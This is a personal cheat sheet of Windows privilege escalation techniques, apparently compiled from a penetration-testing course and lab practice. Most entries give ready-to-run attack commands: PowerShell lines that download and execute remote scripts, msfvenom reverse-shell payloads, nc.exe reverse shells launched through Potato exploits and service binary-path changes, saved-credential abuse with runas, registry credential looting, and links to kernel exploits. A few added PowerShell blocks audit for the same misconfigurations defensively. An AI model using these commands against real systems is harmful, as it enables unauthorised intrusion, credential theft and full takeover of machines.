Windows Privilege Escalation Jutsus

Introduction

This is a list of Windows Privilege Escalation jutsus I am collecting. Most originated from TCM's Windows Priv Esc course.

1. winPEAS.exe

Link: winPEAS github

2. PowerUp.ps1

  1. echo IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.26/PowerUp.ps1') | powershell -noprofile -
  2. For the above, append the line Invoke-AllChecks to the end of PowerUp.ps1 so the checks run when the script is executed.

3. Sherlock.ps1

  1. echo IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.26/Sherlock.ps1') | powershell -noprofile -
  2. For the above, append the line Find-AllVulns to the end of Sherlock.ps1.
  3. Note: it takes a while.

3.5. windows_local_suggester.py

  1. https://github.com/AonCyberLabs/Windows-Exploit-Suggester
  2. python windows-exploit-suggester.py --update
  3. python windows-exploit-suggester.py --database 2014-06-06-mssb.xlsx --systeminfo win7sp1-systeminfo.txt

3.6 Looting for Passwords

Detection

  1. PayloadsAllTheThings Passwords EoF
  2. reg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\winlogon"
  3. reg query HKLM /f password /t REG_SZ /s
  4. reg query HKCU /f password /t REG_SZ /s
  5. Check unattend.xml files
  6. Check whether copies of the SAM or SYSTEM files exist; winPEAS reports these.

4.0 Kernel Exploits

SecWiki windows-kernel-exploits: https://github.com/SecWiki/windows-kernel-exploits

4. Chimichurri MS10-059

Link: chim.exe github

4.1 ClientCopyImage Win32k MS15-051

Link: Only use ZIP: ms15-051x64.exe

4.2 Windows 8.1 x64 RGNOBJ Integer Overflow MS16-098

Link: Binary up above.

4.3 Churrasco.exe WebDav

Link: churrasco.exe

Link: SHELL

7. Hot Potato

Detection

Look for SeAssignPrimaryTokenPrivilege or SeImpersonatePrivilege in the output of whoami /priv. I have also seen it work without these displaying after whoami /priv. Try this if you're running out of ideas.

potato.exe Instructions

  1. msfvenom -p windows/shell_reverse_tcp LHOST=10.2.43.23 LPORT=4444 -f exe > shell.exe
  2. Potato.exe is here: Potato
  3. potato.exe -ip 10.10.80.141 -cmd "C:\Users\user\Desktop\shell.exe" -enable_httpserver true -enable_defender true -enable_spoof true -enable_exhaust true
  4. The -ip value should be the victim's IP, not yours.

Tater.ps1 Instructions

  1. Link to Tater PowerShell: https://github.com/Kevin-Robertson/Tater. GitHub works too.
  2. The msfvenom command above also applies here.
  3. powershell -ep bypass
  4. . .\Tater.ps1
  5. Invoke-Tater -Trigger 1 -Command "C:\Users\user\Desktop\nc.exe 10.2.43.23 4444 -e cmd.exe"

PrintSpoofer.exe

  1. Download PrintSpoofer here: Print Potato
  2. PrintSpoofer.exe -i -c "C:\Users\user\Desktop\shell.exe"

JuicyPotato.exe

  1. Put the following nc.exe command in a batch file (go.bat in the next step): C:\Users\Administrator\.jenkins\nc.exe 10.10.14.26 53 -e C:\Windows\System32\cmd.exe
  2. JuicyPotato.exe -l 1337 -p C:\Users\Administrator\.jenkins\go.bat -t * -c {69AD4AEE-51BE-439b-A92C-86AE490E8B30}

RoguePotato.exe

It hasn't worked for me, but if desperate: Rogue Potato

8. RunAs

Detection and Exploitation

cmdkey definition: creates, lists, and deletes stored user names and passwords or credentials.

  1. cmdkey /list
  2. C:\Windows\System32\runas.exe /user:ACCESS\Administrator /savecred "C:\Windows\System32\cmd.exe /c TYPE C:\Users\Administrator\Desktop\root.txt > C:\Users\security\root.txt"

--- OR ---

  1. cmdkey /list
  2. msfvenom -p windows/shell_reverse_tcp lhost=10.10.14.18 lport=4444 exitfunc=thread -f exe -o shell.exe
  3. C:\Windows\System32\runas.exe /user:ACCESS\Administrator /savecred "shell.exe"

9. Always Install Elevated

Detection - 2 Options

Option 1 - PowerUp

  1. powershell -ep bypass
  2. . .\PowerUp.ps1
  3. Invoke-AllChecks

Option 2 - Reg Queries

  1. Open a command prompt and type: reg query HKLM\Software\Policies\Microsoft\Windows\Installer
  2. From the output, notice that the “AlwaysInstallElevated” value is 1.
  3. In the command prompt type: reg query HKCU\Software\Policies\Microsoft\Windows\Installer
  4. From the output, notice that the “AlwaysInstallElevated” value is 1.
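An added audit helper (my example, not part of the original notes or of PowerUp) that performs the two reg queries above in one step. The function name Test-AlwaysInstallElevated is my own; it reports both hive values, whether the policy is actually in effect (both must be 1), and the fix an administrator should apply.

```powershell
# Added example: audit the AlwaysInstallElevated policy in both hives.
# The policy only takes effect when HKLM and HKCU both hold the value 1.
function Test-AlwaysInstallElevated {
    $subKey = 'Software\Policies\Microsoft\Windows\Installer'
    $values = [ordered]@{}

    foreach ($hive in 'HKLM', 'HKCU') {
        $path  = "${hive}:\$subKey"
        $value = $null
        if (Test-Path -Path $path) {
            # Missing value is a non-terminating error; treat it as "not set".
            $item = Get-ItemProperty -Path $path -Name AlwaysInstallElevated -ErrorAction SilentlyContinue
            if ($item) { $value = $item.AlwaysInstallElevated }
        }
        $values[$hive] = $value
    }

    $enabled = ($values['HKLM'] -eq 1) -and ($values['HKCU'] -eq 1)
    if ($enabled) {
        $remediation = 'Set AlwaysInstallElevated to 0 in both hives (or remove the policy) and re-apply Group Policy.'
    } else {
        $remediation = 'Policy not in effect; no action needed.'
    }

    [pscustomobject]@{
        HKLM        = $values['HKLM']
        HKCU        = $values['HKCU']
        Enabled     = $enabled
        Remediation = $remediation
    }
}

Test-AlwaysInstallElevated | Format-List
```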

Exploitation

  1. Run Write-UserAddMSI from PowerUp.
  2. msfvenom -p windows/shell_reverse_tcp lhost=10.2.43.23 lport=4444 exitfunc=thread -f msi -o shell.msi

10. Regsvc ACL

Detection

  1. powershell -ep bypass
  2. Get-Acl -Path hklm:\System\CurrentControlSet\services\regsvc | fl
  3. Check whether the output shows that “NT AUTHORITY\INTERACTIVE” has “FullControl” permission over the registry key.
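An added audit helper (my example, not from the original notes) that generalises the Get-Acl check above to every service key under HKLM\SYSTEM\CurrentControlSet\Services, reporting any key where a low-privilege principal holds write rights. The function name Get-WritableServiceKey and the list of principals are my own choices; run it as an administrator for a complete view.

```powershell
# Added example: find service registry keys writable by low-privilege principals.
function Get-WritableServiceKey {
    # Principals that any interactive or authenticated user falls under.
    $lowPriv = @('NT AUTHORITY\INTERACTIVE', 'NT AUTHORITY\Authenticated Users',
                 'BUILTIN\Users', 'Everyone')
    # Either of these rights lets the holder change ImagePath; FullControl includes both.
    $writeBits = [System.Security.AccessControl.RegistryRights]::SetValue -bor
                 [System.Security.AccessControl.RegistryRights]::WriteKey

    Get-ChildItem -Path 'HKLM:\SYSTEM\CurrentControlSet\Services' -ErrorAction SilentlyContinue |
        ForEach-Object {
            $key = $_
            $acl = Get-Acl -Path $key.PSPath -ErrorAction SilentlyContinue
            if (-not $acl) { return }
            foreach ($ace in $acl.Access) {
                if ($ace.AccessControlType -ne 'Allow') { continue }
                $id = $ace.IdentityReference.Value
                if ($lowPriv -notcontains $id) { continue }
                if (($ace.RegistryRights -band $writeBits) -eq 0) { continue }
                [pscustomobject]@{
                    Service   = $key.PSChildName
                    Principal = $id
                    Rights    = $ace.RegistryRights
                    Inherited = $ace.IsInherited
                }
            }
        }
}

# Each row is a key whose ACL should be tightened to administrators/SYSTEM only.
Get-WritableServiceKey | Format-Table -AutoSize
```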

Exploitation

  1. sudo apt install gcc-mingw-w64
  2. Edit windows_service.c as needed.
  3. x86_64-w64-mingw32-gcc windows_service.c -o x.exe
  4. Place x.exe in C:\Temp
  5. Open a command prompt and type: reg add HKLM\SYSTEM\CurrentControlSet\services\regsvc /v ImagePath /t REG_EXPAND_SZ /d c:\temp\x.exe /f
  6. In the command prompt type: sc start regsvc
  7. Confirm that the user was added to the local administrators group by typing: net localgroup administrators

11. Executable Files

Detection

  1. powershell -ep bypass
  2. . .\PowerUp.ps1
  3. OR: accesschk64.exe -wvu "C:\Program Files\File Permissions Service"
  4. Notice that the “Everyone” group has “FILE_ALL_ACCESS” permission on the filepermservice.exe file.

Exploitation

  1. x.exe can be an msfvenom-generated reverse shell or the x.exe built from windows_service.c.
  2. Open a command prompt and type: copy /y c:\Temp\x.exe "c:\Program Files\File Permissions Service\filepermservice.exe"
  3. In the command prompt type: sc start filepermsvc

12. Escalation via Binary Paths (binPath)

  1. powershell -ep bypass
  2. . .\PowerUp.ps1
  3. Invoke-AllChecks
  4. accesschk64.exe -uwcv Everyone * (checks the entire machine)
  5. accesschk64.exe -wuvc daclsvc
  6. Notice that the output shows that the user “User-PC\User” has the “SERVICE_CHANGE_CONFIG” permission.

Exploitation

  1. sc qc daclsvc (shows the current binary path)
  2. sc config daclsvc binpath= "net localgroup administrators user /add"
  3. sc start daclsvc
  4. Note: expect an error; it should still work.
  5. OR: sc config UsoSvc binpath= "C:\Reports\nc.exe 10.10.14.26 5555 -e cmd.exe"

13. Unquoted Service Paths

  1. powershell -ep bypass
  2. . .\PowerUp.ps1
  3. Invoke-AllChecks

Exploitation

  1. Rule: the binary path must be unquoted AND contain a space.
  2. msfvenom -p windows/shell_reverse_tcp LHOST=10.2.43.23 LPORT=4444 -f exe > common.exe
  3. Place common.exe in the C:\Program Files\Unquoted Path Service\Common Files folder.
  4. sc start unquotedsvc
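An added audit helper (my example, not from the original notes or PowerUp) that implements the rule above across all installed services: flag any service whose image path is unquoted and has a space before the executable name, and print the quoted form an administrator should set. The function name Get-UnquotedServicePath and the output fields are my own.

```powershell
# Added example: list services with unquoted image paths containing a space.
function Get-UnquotedServicePath {
    Get-CimInstance -ClassName Win32_Service | ForEach-Object {
        $path = $_.PathName
        if (-not $path) { return }
        # Already-quoted paths are safe regardless of spaces.
        if ($path.StartsWith('"')) { return }
        # Split the executable from its arguments at the first ".exe".
        $m   = [regex]::Match($path, '^(.*?\.exe)', 'IgnoreCase')
        $exe = if ($m.Success) { $m.Groups[1].Value } else { $path }
        # Only a space inside the executable path is ambiguous to the loader.
        if ($exe -notmatch ' ') { return }
        [pscustomobject]@{
            Name      = $_.Name
            StartMode = $_.StartMode
            RunAs     = $_.StartName
            PathName  = $path
            # Remediation: set this quoted value as the service's binary path
            # (via sc config with escaped quotes, or by editing ImagePath).
            FixedPath = '"' + $exe + '"' + $path.Substring($exe.Length)
        }
    }
}

Get-UnquotedServicePath | Format-Table -AutoSize
```

Services running as LocalSystem with an automatic start mode are the ones to fix first, since those are the cases the notes above rely on.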

14. CVE-2019-1388 (Internet Certificate)

https://www.youtube.com/watch?v=3BQKpPNlTSo
https://github.com/jas502n/CVE-2019-1388

15. DLL Hijacking

Detection

  1. SysInternals -> Process Monitor -> Procmon (Admin only)
  2. Filter by RESULT is NAME NOT FOUND
  3. Filter by PATH ends with .dll
  4. Note: winPEAS or PowerUp may also report this, since Procmon obviously can't be used without admin rights.

Exploitation

  1. Get windows_dll.c here: windows_dll.c github.
  2. x86_64-w64-mingw32-gcc windows_dll.c -shared -o hijackme.dll
  3. sc stop dllsvc
  4. sc start dllsvc

16. Scheduled Tasks

Detection

  1. Note: hard to detect; you'll have to find a script that a task runs.
  2. schtasks /query /fo LIST /v
  3. accesschk64.exe -quv user CleanUp.ps1

49. WSL (Windows Subsystem for Linux)

Detection

  1. where /R c:\windows bash.exe
  2. where /R c:\windows wsl.exe
  3. Get into bash, run history, and look around.
  4. PayloadsAllTheThings WSL

50. Startup Application

Detection

  1. Open a command prompt and type: icacls.exe "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup"
  2. From the output notice that the “BUILTIN\Users” group has full access ‘(F)’ to the directory.

Exploitation

  1. msfvenom -p windows/shell_reverse_tcp LHOST=10.2.43.23 LPORT=4444 -f exe > x.exe
  2. Place x.exe in “C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup”.
  3. (mv x.exe C:\....) then log off.
  4. Login with the administrator account credentials.


I don't want to be backed into a corner, so I have many jutsus :). The numbers relate to significance: higher number = I use it more often. Some techniques are out of order, though.
